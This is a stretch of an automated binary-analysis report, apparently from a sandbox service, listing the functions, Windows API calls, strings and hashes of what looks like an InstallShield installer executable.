                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcscmp.LIBCMT ref: 0040CCD2
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104), ref: 0040CD6A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName_wcscmp
                                                                                                                                                                          • String ID: Files$Folders$HsG$HsG$NO_KEY_VALUE$_ISMSIDEL.INI
                                                                                                                                                                          • API String ID: 1193818139-1053003534
                                                                                                                                                                          • Opcode ID: cee0d852799ef47b46240a3989a62840b3f515119edbeba35c07b458c3eee0b8
                                                                                                                                                                          • Instruction ID: 7fb2dc1470dd83984b052697f8f68d2a86cbf5bc731933dc406f754ab513c14c
                                                                                                                                                                          • Opcode Fuzzy Hash: cee0d852799ef47b46240a3989a62840b3f515119edbeba35c07b458c3eee0b8
                                                                                                                                                                          • Instruction Fuzzy Hash: E5C15271900358EADB21EB51CC49BDEB7B8BB10308F1445EBE549B31C2DB785B89CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00457A89, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 256processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00457A93
                                                                                                                                                                          • _memset.LIBCMT ref: 00457B2C
                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 00457BA4
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00457BBF
                                                                                                                                                                          • _memset.LIBCMT ref: 00457C1F
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457CEE
                                                                                                                                                                          • WaitForInputIdle.USER32 ref: 00457D69
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00457D8D
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00457D97
                                                                                                                                                                            • Part of subcall function 0041D880: __EH_prolog3_GS.LIBCMT ref: 0041D88A
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041B2AF: __EH_prolog3_GS.LIBCMT ref: 0041B2B6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$FreeProcessString_memset$CodeCreateExecuteExitIdleInputShellWait
                                                                                                                                                                          • String ID: <$D$HsG
                                                                                                                                                                          • API String ID: 3263116737-2123543526
                                                                                                                                                                          • Opcode ID: ccea890404a5b2dc674fa3aa8cbfa9ebfe07e6f56a9a629094fdfbd4a711a2b1
                                                                                                                                                                          • Instruction ID: e99105c32301c2b9f9e72ad1d92787400854d41ea33f21c08c76ee520aa9e478
                                                                                                                                                                          • Opcode Fuzzy Hash: ccea890404a5b2dc674fa3aa8cbfa9ebfe07e6f56a9a629094fdfbd4a711a2b1
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA1B571800248EEDB20EFA5CC45FDE7B78AF55304F04416EFD0AA7292DB785A49CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004026D0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402735
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402795
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004027BE
                                                                                                                                                                          • SetLastError.KERNEL32(?,00000000,00000000,000000FF), ref: 0040281E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040283E
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 0040288A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402899
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004028B3
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004028C0
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004028E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-815662401
                                                                                                                                                                          • Opcode ID: 71cd8f9d2933eca90edd387c86763be0810450cee94afa3b6677b495f4f40b84
                                                                                                                                                                          • Instruction ID: cdbf6a085d593452c2e731b6caff73d97af445c8ed884316c6e615f2f30cdbe4
                                                                                                                                                                          • Opcode Fuzzy Hash: 71cd8f9d2933eca90edd387c86763be0810450cee94afa3b6677b495f4f40b84
                                                                                                                                                                          • Instruction Fuzzy Hash: A1512B715087409FD310DF29C948B5BBBF4FF89318F104A2EE999976A1D779E804CB8A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043CEA5, Relevance: 21.1, APIs: 14, Instructions: 107windowmemoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043CEAF
                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?,00000424,0043D124), ref: 0043CEC1
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0043CEE4
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0043CEF4
                                                                                                                                                                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0043CF09
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000408), ref: 0043CF18
                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 0043CF28
                                                                                                                                                                          • GetSystemPaletteEntries.GDI32(?,00000000,0000000A,00000004), ref: 0043CFC3
                                                                                                                                                                          • GetSystemPaletteEntries.GDI32(?,000000F6,0000000A,000003DC), ref: 0043CFD4
                                                                                                                                                                          • CreatePalette.GDI32(00000000), ref: 0043CFD7
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0043CFE3
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0043CFFA
                                                                                                                                                                          • CreateHalftonePalette.GDI32(00000000), ref: 0043D003
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0043D010
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Palette$Create$EntriesGlobalObjectSystem$AllocColorCompatibleDeleteH_prolog3_HalftoneLockReleaseSelectTable
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 447354755-0
                                                                                                                                                                          • Opcode ID: a111f4ed5d38e5bca96b9457fea99d3e5bb589bb35b783ca3674186b054c1343
                                                                                                                                                                          • Instruction ID: 849773926da403f97f1caf2d359c7c4e59e6385afba593153f2c4442404c29fc
                                                                                                                                                                          • Opcode Fuzzy Hash: a111f4ed5d38e5bca96b9457fea99d3e5bb589bb35b783ca3674186b054c1343
                                                                                                                                                                          • Instruction Fuzzy Hash: 42415BB15002889FC710DF609C48AE97F79EF59304F1580F9FA4DA7292D6354A86CF6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405260, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004052BF
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 004052F3
                                                                                                                                                                            • Part of subcall function 00405B10: MultiByteToWideChar.KERNEL32(00000007,00000000,00000000,00000001,00000000,00000000,CC858012,00000000,0000000B,?), ref: 00405CA0
                                                                                                                                                                            • Part of subcall function 00405B10: MultiByteToWideChar.KERNEL32(00000007,00000000,?), ref: 00405CDA
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00471344,000000FF), ref: 00405322
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 0040536E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405381
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040539B
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004053A8
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004053CC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$ByteCharFreeMultiStringWide
                                                                                                                                                                          • String ID: HsG$HsG$HsG$m<H
                                                                                                                                                                          • API String ID: 2284902721-1568047563
                                                                                                                                                                          • Opcode ID: 4abcf6c6b92f3abe56b14e23d28952b3a7d80fad0133c9d5b39ab4039d398ab0
                                                                                                                                                                          • Instruction ID: 5db28ef6be46b99bb38aed72c803002c3cb564db236bb73f6af1ef404ea211e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 4abcf6c6b92f3abe56b14e23d28952b3a7d80fad0133c9d5b39ab4039d398ab0
                                                                                                                                                                          • Instruction Fuzzy Hash: 524106B15083409FD700DF69C988B4ABBE4FF88318F51496EF8589B261D775E804CF86
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004593FD, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004594FD: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
                                                                                                                                                                            • Part of subcall function 004594FD: GetProcAddress.KERNEL32(00000000), ref: 00459517
                                                                                                                                                                            • Part of subcall function 004594FD: GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00000000,?,00000000,?,?,004283B1,00000001), ref: 00459420
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00459429
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,?,004283B1,00000001), ref: 00459434
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00459437
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$CurrentProcess
                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$pgJ$pgJ
                                                                                                                                                                          • API String ID: 565683799-3440938694
                                                                                                                                                                          • Opcode ID: e8a31edd9813ddd4de7970e7a50d52740b16cecb3a1409188b32aaebed054360
                                                                                                                                                                          • Instruction ID: 27163716600c6c25b8d2def2750d3a6a8d7fbba046c48fa91ec0526090da6370
                                                                                                                                                                          • Opcode Fuzzy Hash: e8a31edd9813ddd4de7970e7a50d52740b16cecb3a1409188b32aaebed054360
                                                                                                                                                                          • Instruction Fuzzy Hash: B11123A0604205FBCB10ABB69C40B6E3B9DEB4A706B14443BE809D3252DB7DCD0A9B18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004241FE, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 269fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00424208
                                                                                                                                                                            • Part of subcall function 00428C18: __EH_prolog3_GS.LIBCMT ref: 00428C22
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000,?,00000104,00000001,00000000,00000104,ISSetup.dll,?,00000001,?,00000001,00000000,?,?,?), ref: 00424505
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,iss,00000000,00000000,?,00000104), ref: 0042454F
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,00000128,00427A1B), ref: 0042459D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileFreeLastStringTemp$DeleteH_prolog3_H_prolog3_catch_NamePath
                                                                                                                                                                          • String ID: Error opening MSI database: %d$Failed to execute query on Binary table, error: %d$Failed to query Binary table, error: %d$ISSetup.dll$SELECT * FROM `Binary`$iss$msiaction.cpp
                                                                                                                                                                          • API String ID: 1463199135-2722078864
                                                                                                                                                                          • Opcode ID: 5d06bd1b21dfdee6b8f320fa7fd9a6eeb4c50ec6d097f3f810b08b6ee8c24971
                                                                                                                                                                          • Instruction ID: c334feb578a811e1845453ea508cfe2e1e8db8aae0ebfe18aa7265d2c6d294f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d06bd1b21dfdee6b8f320fa7fd9a6eeb4c50ec6d097f3f810b08b6ee8c24971
                                                                                                                                                                          • Instruction Fuzzy Hash: 56C184309001A8EEDB21DB61CD45BDDB7B4AF11308F5480EAE549B7191DBB81F88DF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00437452, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 248stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043745C
                                                                                                                                                                            • Part of subcall function 0042FDE6: __EH_prolog3.LIBCMT ref: 0042FDED
                                                                                                                                                                            • Part of subcall function 0042FE5D: GetVersionExW.KERNEL32(?,?,?), ref: 0042FE9A
                                                                                                                                                                            • Part of subcall function 0042FE5D: GetSystemInfo.KERNEL32(?,?,?), ref: 0042FEEC
                                                                                                                                                                            • Part of subcall function 004113B6: __EH_prolog3.LIBCMT ref: 004113BD
                                                                                                                                                                            • Part of subcall function 004119C2: __EH_prolog3_GS.LIBCMT ref: 004119CC
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0043773E
                                                                                                                                                                            • Part of subcall function 004352C7: __EH_prolog3_catch.LIBCMT ref: 004352CE
                                                                                                                                                                            • Part of subcall function 004352C7: lstrcmpW.KERNEL32(00000008,00483E18,?,?,00483E18,00000008,?,00000004,004374EE,Startup,Source,00000001,?,00000400,00000452), ref: 004352F6
                                                                                                                                                                            • Part of subcall function 00435380: __EH_prolog3_GS.LIBCMT ref: 0043538A
                                                                                                                                                                          • ~_Task_impl.LIBCPMT ref: 004377D6
                                                                                                                                                                          • ~_Task_impl.LIBCPMT ref: 004377E9
                                                                                                                                                                            • Part of subcall function 0042E6A2: __EH_prolog3_GS.LIBCMT ref: 0042E6AC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$H_prolog3Task_impl$H_prolog3_catchInfoSystemVersionlstrcmplstrlen
                                                                                                                                                                          • String ID: BetaMarker.dat$EvalMarker.dat$KEY$PASSWORD$Source$Startup$|LJ
                                                                                                                                                                          • API String ID: 4055012072-2629155533
                                                                                                                                                                          • Opcode ID: 80cdcfcf953ca3afb0a49e1b15994a542e119affbe420d5d09d8ff1ad770c1cb
                                                                                                                                                                          • Instruction ID: 058473923310ad608baa25f56d86c1c014b6a368f64ae89df39ae6a118ea4fda
                                                                                                                                                                          • Opcode Fuzzy Hash: 80cdcfcf953ca3afb0a49e1b15994a542e119affbe420d5d09d8ff1ad770c1cb
                                                                                                                                                                          • Instruction Fuzzy Hash: AF91F6B0A0A615AAEB25E771CC51BFEB7A4AF05304F0441EFE449A3193DB385E44CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456F8C, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 238memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00456F96
                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000014C,0043B872,?), ref: 00456FF8
                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00457033
                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000221,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00457053
                                                                                                                                                                          • _memset.LIBCMT ref: 00457063
                                                                                                                                                                          • SetEntriesInAclW.ADVAPI32 ref: 004570FC
                                                                                                                                                                          • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00457130
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Initialize$Allocate$DescriptorEntriesH_prolog3H_prolog3_Security_memset
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2208176779-815662401
                                                                                                                                                                          • Opcode ID: 29fdd669347f08925f8a05906393d594b474ebb10eaf96851ff8d35676633cf9
                                                                                                                                                                          • Instruction ID: 4a8fc01e01686fedfbbd6b6c0db099c278e90a9120d71ec210ee663dde4e012f
                                                                                                                                                                          • Opcode Fuzzy Hash: 29fdd669347f08925f8a05906393d594b474ebb10eaf96851ff8d35676633cf9
                                                                                                                                                                          • Instruction Fuzzy Hash: C39144B1D00259AADB20DF55CC81BEEB7B8BF54304F4044EEE509B6292EB745B88CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00422469, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 191COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00422473
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00436EFC: _memset.LIBCMT ref: 00436F28
                                                                                                                                                                            • Part of subcall function 00422751: __EH_prolog3_catch_GS.LIBCMT ref: 0042275B
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
